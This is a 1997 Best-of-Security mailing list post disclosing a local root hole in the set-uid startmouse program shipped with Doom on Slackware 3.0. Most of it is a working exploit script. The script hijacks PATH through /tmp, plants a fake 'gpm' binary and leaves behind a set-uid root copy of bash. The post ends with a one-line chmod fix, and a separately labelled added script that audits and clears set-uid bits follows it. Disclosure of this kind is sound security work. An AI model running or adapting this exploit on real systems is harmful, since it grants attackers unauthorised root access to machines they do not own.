[49] in Best-of-Security
BoS: Security hole in Slack (startmouse - Doom) + exploit
daemon@ATHENA.MIT.EDU (Cristian VARVAS)
Thu Feb 27 07:32:15 1997
Date: Wed, 26 Feb 1997 12:04:05 +0200 (EET)
From: Cristian VARVAS <jolly@ana.utcluj.ro>
Cc: admin@utcluj.ro
In-Reply-To: <Pine.GSO.3.95.970222170637.18883A-100000@sundy.cs.pub.ro>
Reply-To: best-of-security@suburbia.net
Errors-To: best-of-security-request@suburbia.net
To: best-of-security@suburbia.net
Resent-From: best-of-security@suburbia.net

I have found a security hole in startmouse on Doom (Slack 3.0).
I made an exploit. My exploit works if you have
/usr/games/doom/startmouse with the suid flag set.

---begin
#!/bin/sh
export PATH=/tmp:$PATH
# (c)1997 by jolly@utcluj.ro
#
echo '#include<stdio.h> '>>/tmp/gpm.c
echo 'void main() '>>/tmp/gpm.c
echo '{ '>>/tmp/gpm.c
echo ' seteuid(0,0); '>>/tmp/gpm.c
echo ' system("cp /bin/bash /tmp/setuid.bash"); '>>/tmp/gpm.c
echo ' system("chmod 4755 /tmp/setuid.bash"); '>>/tmp/gpm.c
echo '} '>>/tmp/gpm.c
#
cc -o /tmp/gpm /tmp/gpm.c
/usr/bin/doom
rm /tmp/gpm.c /tmp/gpm
sleep 5
/tmp/setuid.bash
---end
Solution: chmod 755 /usr/games/doom/startmouse
--------------------------------------------------------------
Technical University Cristian VARVAS <cvarvas@utcluj.ro>
of Str. M. Viteazu, Nr. 21, Ap. 50
Cluj-Napoca RO 2400 SIBIU
Data Communication Center tel +40(0)69-420418,fax 213901
--------------------------------------------------------------
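
Added example, not part of the original post: the message's fix clears the set-uid bit on one file, and this sketch generalizes that to reporting every set-uid file under a directory tree and clearing the bit with a verification step. The function names and the directory argument are assumptions made for the illustration.

```shell
#!/bin/sh
# Added example (not from the original post): find set-uid files under a
# directory and clear the bit, as the post's "chmod 755" does for one file.
# All function names here are hypothetical.

# list_suid DIR: print each regular file under DIR that has the set-uid bit.
list_suid() {
    find "$1" -xdev -type f -perm -4000 -print 2>/dev/null
}

# report_suid DIR: print "mode uid=<owner> path" for each finding.
# Numeric owner (ls -n) makes root-owned (uid=0) entries stand out.
report_suid() {
    list_suid "$1" | while IFS= read -r f; do
        ls -ldn "$f" | {
            read -r mode links uid rest
            printf '%s uid=%s %s\n' "$mode" "$uid" "$f"
        }
    done
}

# clear_suid FILE: remove the set-uid bit and verify that it is gone.
# Returns 0 if cleared, 1 if FILE was not set-uid, 2 if FILE is missing,
# 3 if chmod failed.
clear_suid() {
    [ -f "$1" ] || return 2
    [ -u "$1" ] || return 1
    chmod u-s "$1" || return 3
    [ ! -u "$1" ]
}

# When run with a directory argument, print the report, e.g.:
#   sh suid_audit.sh /usr/games
if [ "$#" -ge 1 ]; then
    report_suid "$1"
fi
```

On a mode 4755 file, `clear_suid` leaves mode 755, the same result as the fix given in the message.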